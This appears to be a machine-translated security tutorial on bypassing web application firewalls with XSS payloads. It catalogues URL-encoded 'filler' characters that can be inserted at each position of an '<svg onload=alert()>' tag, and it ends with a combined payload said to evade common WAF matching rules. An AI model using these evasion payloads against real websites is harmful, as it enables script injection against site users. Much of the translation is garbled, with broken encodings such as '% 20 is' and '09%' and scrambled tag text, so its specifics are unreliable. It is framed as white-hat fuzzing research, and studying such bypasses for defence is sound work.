This is a waf && filter Exploration and bypass the series.
1. Study: XSS, html tag, padding
First of all say something about the concept of padding.
Keywords can be used to separate the grammar symbol without affecting semantics. For example, a simple example of XSS payload <svg οnlοad = alert ( )>. We can use / instead of spaces between and svg onload, and will not affect the parsing of html. We say, / is a filler.
In the process of waf & filter bypass, the filler plays a very important role - it "destroyed" the syntax should look like.
Today we'll talk about, xss, the padding in html context and how to use padding to bypass waf & filter.
2. Modeling
The following explanation is based on our label <svg οnlοad = alert ()> will be described.
First define what each part of the label.
- Start tag: <svg // head
- Event Processing: event onload //
between 2.5 and events equal number - After triggering the execution of the function: alert () // func
between 3.5 equals sign and execute the function - End tag:> // tail
3. Exploring
Test Range: http://brutelogic.com.br/xss.php?a=1
1. filler between the start tag and the event handler (url encoded description)
BetTagAndEvent = { "% 20 is", "/", "09%", "% 0A", "0D%", "/ XXX /" , "% 0c"} (and repeatable, such as 09%, 09%)
followed by a space, /, horizontal tab, line feed, carriage return, / any character / formfeeds
the filler filler known, canonical described as
(filler).*
2. The event processing between equal numbers (url encoding described)
{ "% 20 is", "09%", "% 0A", "0D%", "% 0c"} (and repeatable, such as 09% 09% )
followed by a space, horizontal tab, line feed, carriage return, new page
being described as
(filler).*
3. The number and equal between the function execution. And 2 are the same.
4. The function name and between brackets.
Form: <Alert SVG οnlοad% 0B = ()>
{ "% 0B"} (and may be repeated as% 0B% 0B)
of the vertical tab, said here about the specific principle, when using other symbols, must be quoted such οnlοad = "alert% 0a () ". Separate function within quotation marks and parentheses, it will still be considered part of the event. But outside the quotation marks,% 0b be alert and () together, will not result in separate, so the browser would think that alert% 0b () is still wrapped in the event.
Regular described as
(%0B).*
The end tag
Tail = { "% 20", "//", ">", "% 0a", "% 0d", "% 09", "% 0c"} ( and may be repeated as% 0a% 0a)
it is described as
(filler).*
4. Summary
Most waf & filter scenario, because often not all the filler was filtered off, the filter or incomplete rule deformities and other issues, leading to a variety of compositions may be bypassed by padding.
Like on the following payload: <svg% 0a% 0aonload % 09 =% 0aalert% 0b ()% 0a
may bypass matching onxxx = 2. 1 = alert 3. matching matching alert () of waf.
Due to the diversity filter may need to be combined with specific scenarios, detailed analysis, you can build your own white hat of fuzz ideas.
As long as a good idea, waf around to the old ~
